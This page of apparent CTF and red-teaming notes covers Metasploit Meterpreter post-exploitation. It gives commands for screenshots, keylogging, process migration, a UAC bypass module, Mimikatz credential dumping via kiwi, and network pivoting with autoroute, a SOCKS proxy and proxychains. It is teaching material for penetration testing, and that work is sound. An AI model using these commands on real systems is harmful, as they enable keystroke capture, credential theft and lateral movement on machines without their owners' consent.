> For the complete documentation index, see [llms.txt](https://ret2basic.gitbook.io/ctfnote/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ret2basic.gitbook.io/ctfnote/red-teaming/command-and-control-c2/metasploit/post-exploitation.md).

# Post Exploitation

## Core Features

Take a screenshot of the compromised desktop:

```bash
meterpreter > screenshot
```

Start a keylogger:

```bash
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
```

## Migrating Processes

When we compromise a host, our Meterpreter payload is executed inside the process of the application we attack. If the victim closes that process, our access to the machine is closed as well.

Using `migrate` command, we can move the execution of our Meterpreter to different processes. To do this, we first run `ps` to view all running processes and then pick one, like `explorer.exe`, and issue the `migrate` command:

```bash
meterpreter > ps
meterpreter > migrate <explorer.exe_id>
```

Or, we can set an **autorun script** before running the module:

```bash
msf6 exploit(multi/handler) > set AutoRunScript post/windows/manage/migrate
```

## Modules

Bypass UAC:

```bash
msf6 > use exploit/windows/local/bypassuac_injection_winsxs
```

PowerShell:

```bash
meterpreter > load powershell
meterpreter > powershell_execute "$PSVersionTable.PSVersion"
```

Mimikatz:

```bash
meterpreter > load kiwi
meterpreter > getsystem
meterpreter > creds_msv
```

## Pivoting

Enumerate network interfaces:

```powershell
C:\Windows\system32>ipconfig
```

Found two nework interfaces:

![ipconfig](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWVjG_njKgBtvmnKaJh%2Fuploads%2FnHSELGmaSDb0gaVmKPag%2Fimage.png?alt=media\&token=46b895af-8efb-4dd1-b93e-9dd6d32f0b8a)

We are on 192.168.214.10 and we want to pivot to 172.16.214.10. Use autoroute:

```bash
msf6 > use multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set session 1
msf6 post(multi/manage/autoroute) > run
```

Use `auxiliary/server/socks_proxy` to configure a SOCKS proxy:

```bash
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set VERSION 4a
```

Configure proxychains at `/etc/proxychains4.conf`:

![/etc/proxychains4.conf](https://3988450783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MWVjG_njKgBtvmnKaJh%2Fuploads%2FgpnbjqUZVGgvstkWoYui%2Fimage.png?alt=media\&token=9aca3675-8abf-4284-b713-b05dc83c9c27)

Now we can run commands with `proxychains` as prefix to pivot. For example:

```bash
proxychains rdesktop 172.16.214.5
```
